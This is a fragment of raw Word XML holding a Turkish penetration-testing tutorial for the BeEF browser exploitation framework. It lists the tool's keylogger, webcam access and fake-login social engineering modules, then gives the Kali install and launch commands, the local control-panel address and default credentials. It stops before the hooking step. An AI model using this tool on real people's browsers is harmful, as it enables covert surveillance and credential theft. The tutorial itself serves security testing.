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C1D19" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Browser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework)</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, tarayıcı tabanlı güvenlik açıklarını test etmek için kullanılan gelişmiş ve güçlü bir sızma testi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>framework’üdür</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">. Özellikle sosyal mühendislik saldırılarıyla ilişkili olarak kullanılır ve hedefin tarayıcısı üzerinden kontrol sağlamaya odaklanır. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> enjeksiyonu yoluyla hedef tarayıcıya “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>” (bağlantı) sağladıktan sonra çeşitli modüllerle komutlar çalıştırabilir, bilgi toplayabilir veya ileri düzey saldırılar gerçekleştirebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D80F4" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="468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42659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Bu aracın özellikleri nelerdir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F7210A" w14:textId="77777777" w:rsidR="007F3392" w:rsidRPr="00426590" w:rsidRDefault="007F3392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D14AAB6" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tarayıcı Odaklı Sömürü:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web tarayıcılarının güvenlik açıklarını hedef alır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF351FF" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistemi:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hedef tarayıcıyı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hook’layarak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bağlayarak) canlı kontrol imkânı sunar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE2FA18" w14:textId="6B0E3AD1" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modüler Yapı:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> İçerisinde çok sayıda yerleşik modül barındırır (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>webcam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> erişimi vb.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A13C64" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gerçek Zamanlı İzleme:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hedef tarayıcının konumu, açık sekmeleri, eklentileri gibi bilgiler gerçek zamanlı alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96A1B9" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sosyal Mühendislik Araçları:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanıcıyı kandırmak için sahte giriş pencereleri, güncelleme uyarıları gibi şablonlar içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6DE12" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arayüzü</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanıcı dostu kontrol paneli ile yönetim sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842244C" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Açık Kaynak:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aktif olarak geliştirilen topluluk destekli bir araçtır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E03CFE" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7050127D" w14:textId="6B7398AE" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="274" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="9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</w:pPr>
      <w:r w:rsidRPr="0042659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Bu aracı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0042659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>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux'a kurma ve kullanma adımları:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381A1A1" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CBDEB9" w14:textId="6739A74D" w:rsidR="000A5116" w:rsidRPr="000A5116" w:rsidRDefault="000A5116" w:rsidP="000A5116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0A51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1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A51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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A51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Kurulumu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C15AD" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="000A5116" w:rsidRDefault="000A5116" w:rsidP="000A511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0A5116">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A51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Linux’ta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A5116">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A51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genellikle ön yüklü gelir. Eğer kurulu değilse şu komut ile kurulabilir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747013F" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D3C4A27" w14:textId="2C7E0A37" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>beef-xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7FBF64" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116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40A96D51" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116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5666954F" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116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5AF64A9B" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116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3E8E4282" w14:textId="387AD2D0" w:rsidR="000A5116" w:rsidRPr="000A5116" w:rsidRDefault="000A5116" w:rsidP="000A5116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0A51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2: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A51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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A51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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A51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Arayüzünü</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A5116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Başlatma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A574E" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A511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0A5116">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A51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0A5116">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>arayüzünü</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A5116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başlatmak için terminale şu komutu yazın:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29110CFE" w14:textId="219FEF1D" w:rsidR="000A5116" w:rsidRPr="000A5116" w:rsidRDefault="000A5116" w:rsidP="000A5116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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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beef-xss</w:t>
      </w:r>
      <w:proofErr w:type="spell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05D99BFE" w14:textId="4EF3AC0B" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="751C04D3" wp14:editId="3565E8C7">
            <wp:extent cx="4432300" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="955935472" name="Resim 1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935472" name="Resim 1" descr="metin, ekran görüntüsü, yazı tipi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FE90" w14:textId="77777777" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590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257A89C6" w14:textId="7C137394" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590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4265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3: Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004265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Arayüzüne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004265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Erişim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69043197" w14:textId="77777777" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="004265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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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kontrol paneline erişmek için tarayıcınızda şu adresi açın:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF31F6" w14:textId="0A043F29" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="004265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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00426590">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="tr-TR"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://127.0.0.1:3000/ui/panel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3276E4C8" w14:textId="77777777" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590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426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanıcı Adı: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C1399AA" w14:textId="613589AE" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Parola: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BFBBD48" w14:textId="77777777" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Giriş yaptıktan sonra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hook’lanmış</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> tarayıcıları ve komut modüllerini buradan yönetebilirsiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707BB0C" w14:textId="77777777" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590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</w:p>
    <w:p w14:paraId="25A5546C" w14:textId="264DF048" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590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</w:pPr>
      <w:r w:rsidRPr="004265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Adım 4: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004265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>Hook</w:t>
